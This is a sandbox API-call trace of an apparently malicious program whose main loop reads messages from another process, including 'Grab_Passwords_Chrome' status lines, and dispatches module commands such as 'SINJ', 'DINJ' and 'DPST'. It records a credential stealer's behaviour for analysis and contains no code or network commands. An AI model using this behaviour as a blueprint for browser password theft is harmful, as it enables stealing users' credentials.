	[0218.815] Sleep (dwMilliseconds=0xbb8) 
	[0218.838] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0218.838] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0218.839] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0218.839] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb950) returned 1
	[0218.839] Sleep (dwMilliseconds=0xbb8) 
	[0218.853] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0218.853] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0218.853] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0218.853] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb950) returned 1
	[0218.853] Sleep (dwMilliseconds=0xbb8) 
	[0218.870] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0218.870] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0218.870] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0218.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb950) returned 1
	[0218.870] Sleep (dwMilliseconds=0xbb8) 
	[0218.885] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0218.885] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0218.885] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0218.885] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb950) returned 1
	[0218.885] Sleep (dwMilliseconds=0xbb8) 
	[0218.901] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0218.901] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0218.901] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0218.901] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cb950) returned 1
	[0218.901] Sleep (dwMilliseconds=0xbb8) 
	[0218.962] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0218.962] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0218.962] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2259f0
	[0218.962] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22ba9c8
	[0218.962] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0218.962] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0218.962] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5f23f, lpBuffer=0x2259f0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2259f0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0218.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0218.962] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa50
	[0218.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x22ffa50, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5
	[0218.963] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5f25f, lpBuffer=0x22ba9c8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22ba9c8*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0218.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ba9c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25
	[0218.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7350
	[0218.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ba9c8, cbMultiByte=-1, lpWideCharStr=0x22c7350, cchWideChar=25 | out: lpWideCharStr="Grab_Passwords_Chrome(0)") returned 25
	[0218.963] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5ece0, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0218.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0218.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb810
	[0218.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x26cb810, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0218.963] SetEvent (hEvent=0x49c) returned 1
	[0218.963] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2259f0) returned 1
	[0218.963] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ba9c8) returned 1
	[0218.963] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0218.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb978
	[0218.963] lstrcmpiW (lpString1="DEBG", lpString2="ModuleQuery") returned -1
	[0218.963] lstrcmpiW (lpString1="DEBG", lpString2="WantRelease") returned -1
	[0218.963] lstrcmpiW (lpString1="DEBG", lpString2="VERS") returned -1
	[0218.963] lstrcmpiW (lpString1="DEBG", lpString2="SINJ") returned -1
	[0218.963] lstrcmpiW (lpString1="DEBG", lpString2="DINJ") returned -1
	[0218.963] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffbd0
	[0218.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x26cb950, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd18) returned 0x58c
	[0218.964] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2736788
	[0218.964] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0218.964] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2736788) returned 1
	[0218.964] Sleep (dwMilliseconds=0xbb8) 
	[0218.978] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0218.978] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0218.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0218.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22ba9c8
	[0218.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2259f0
	[0218.978] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0218.978] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5f239, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0218.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0218.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffbb8
	[0218.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x22ffbb8, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5
	[0218.978] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5f245, lpBuffer=0x22ba9c8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22ba9c8*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0218.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ba9c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25
	[0218.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7398
	[0218.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ba9c8, cbMultiByte=-1, lpWideCharStr=0x22c7398, cchWideChar=25 | out: lpWideCharStr="Grab_Passwords_Chrome(1)") returned 25
	[0218.978] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5ece0, lpBuffer=0x2259f0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2259f0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0218.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0218.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737bb0
	[0218.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x2737bb0, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0218.978] SetEvent (hEvent=0x49c) returned 1
	[0218.979] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0218.979] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ba9c8) returned 1
	[0218.979] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2259f0) returned 1
	[0218.979] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737bd8
	[0218.979] lstrcmpiW (lpString1="DEBG", lpString2="ModuleQuery") returned -1
	[0218.979] lstrcmpiW (lpString1="DEBG", lpString2="WantRelease") returned -1
	[0218.979] lstrcmpiW (lpString1="DEBG", lpString2="VERS") returned -1
	[0218.979] lstrcmpiW (lpString1="DEBG", lpString2="SINJ") returned -1
	[0218.979] lstrcmpiW (lpString1="DEBG", lpString2="DINJ") returned -1
	[0218.979] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffbe8
	[0218.979] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2736788, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd0c) returned 0x574
	[0218.980] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737c00
	[0218.980] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0218.980] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737c00) returned 1
	[0218.980] Sleep (dwMilliseconds=0xbb8) 
	[0218.993] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0218.993] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0218.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2259f0
	[0218.993] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22ba9c8
	[0218.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0218.994] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0218.994] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5f38f, lpBuffer=0x2259f0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2259f0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0218.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0218.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffc18
	[0218.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x22ffc18, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5
	[0218.994] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5f36c, lpBuffer=0x22ba9c8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22ba9c8*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0218.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ba9c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25
	[0218.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7278
	[0218.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ba9c8, cbMultiByte=-1, lpWideCharStr=0x22c7278, cchWideChar=25 | out: lpWideCharStr="Grab_Passwords_Chrome(2)") returned 25
	[0218.994] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5ece0, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0218.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0218.994] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737c28
	[0218.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x2737c28, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0218.994] SetEvent (hEvent=0x49c) returned 1
	[0219.080] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2259f0) returned 1
	[0219.080] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ba9c8) returned 1
	[0219.081] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0219.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737c50
	[0219.081] lstrcmpiW (lpString1="DEBG", lpString2="ModuleQuery") returned -1
	[0219.081] lstrcmpiW (lpString1="DEBG", lpString2="WantRelease") returned -1
	[0219.081] lstrcmpiW (lpString1="DEBG", lpString2="VERS") returned -1
	[0219.081] lstrcmpiW (lpString1="DEBG", lpString2="SINJ") returned -1
	[0219.081] lstrcmpiW (lpString1="DEBG", lpString2="DINJ") returned -1
	[0219.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffc00
	[0219.081] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2737c00, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd08) returned 0x59c
	[0219.081] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737c78
	[0219.081] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.081] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737c78) returned 1
	[0219.082] Sleep (dwMilliseconds=0xbb8) 
	[0219.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737c78
	[0219.087] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.087] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0219.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2255b0
	[0219.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22ba9c8
	[0219.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2259f0
	[0219.088] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0219.088] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5f233, lpBuffer=0x2255b0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2255b0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0219.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0219.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffc30
	[0219.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2255b0, cbMultiByte=-1, lpWideCharStr=0x22ffc30, cchWideChar=5 | out: lpWideCharStr="DEBG") returned 5
	[0219.088] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5f279, lpBuffer=0x22ba9c8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22ba9c8*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0219.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ba9c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32
	[0219.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aa5f0
	[0219.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ba9c8, cbMultiByte=-1, lpWideCharStr=0x22aa5f0, cchWideChar=32 | out: lpWideCharStr="Grab_Passwords_Chrome() success") returned 32
	[0219.088] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5ece0, lpBuffer=0x2259f0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2259f0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0219.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0219.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737ca0
	[0219.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x2737ca0, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0219.088] SetEvent (hEvent=0x49c) returned 1
	[0219.088] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2255b0) returned 1
	[0219.088] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ba9c8) returned 1
	[0219.088] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2259f0) returned 1
	[0219.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737cc8
	[0219.088] lstrcmpiW (lpString1="DEBG", lpString2="ModuleQuery") returned -1
	[0219.088] lstrcmpiW (lpString1="DEBG", lpString2="WantRelease") returned -1
	[0219.088] lstrcmpiW (lpString1="DEBG", lpString2="VERS") returned -1
	[0219.088] lstrcmpiW (lpString1="DEBG", lpString2="SINJ") returned -1
	[0219.089] lstrcmpiW (lpString1="DEBG", lpString2="DINJ") returned -1
	[0219.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffaf8
	[0219.089] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2737c78, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd20) returned 0x598
	[0219.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737cf0
	[0219.089] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.089] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737cf0) returned 1
	[0219.089] Sleep (dwMilliseconds=0xbb8) 
	[0219.103] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738330
	[0219.103] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.104] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0219.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2259f0
	[0219.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x24d3b0
	[0219.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225b00
	[0219.104] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0219.104] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5f891, lpBuffer=0x2259f0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2259f0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0219.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0219.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffeb8
	[0219.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x22ffeb8, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0219.104] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5f987, lpBuffer=0x24d3b0, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x24d3b0*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0219.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x24d3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28
	[0219.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c71a0
	[0219.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x24d3b0, cbMultiByte=-1, lpWideCharStr=0x22c71a0, cchWideChar=28 | out: lpWideCharStr="Browser passwords are empty") returned 28
	[0219.104] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1b5f380, lpBuffer=0x225b00, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225b00*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0219.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0219.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738358
	[0219.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225b00, cbMultiByte=-1, lpWideCharStr=0x2738358, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0219.104] SetEvent (hEvent=0x49c) returned 1
	[0219.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2259f0) returned 1
	[0219.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d3b0) returned 1
	[0219.686] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225b00) returned 1
	[0219.686] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2738380
	[0219.686] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0219.686] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0219.686] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0219.686] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0219.686] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0219.686] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffed0
	[0219.686] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x2738330, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xd10) returned 0x5bc
	[0219.728] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f70
	[0219.728] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.728] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f70) returned 1
	[0219.728] Sleep (dwMilliseconds=0xbb8) 
	[0219.748] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f70
	[0219.748] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.748] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.748] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.748] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f70) returned 1
	[0219.748] Sleep (dwMilliseconds=0xbb8) 
	[0219.758] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f70
	[0219.758] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.758] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.758] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.758] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f70) returned 1
	[0219.758] Sleep (dwMilliseconds=0xbb8) 
	[0219.773] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2737f70
	[0219.773] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.773] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.773] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0219.773] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737f70) returned 1
	[0219.774] Sleep (dwMilliseconds=0xbb8) 
	[0219.817] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777d58
	[0219.817] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0219.817] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0219.817] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
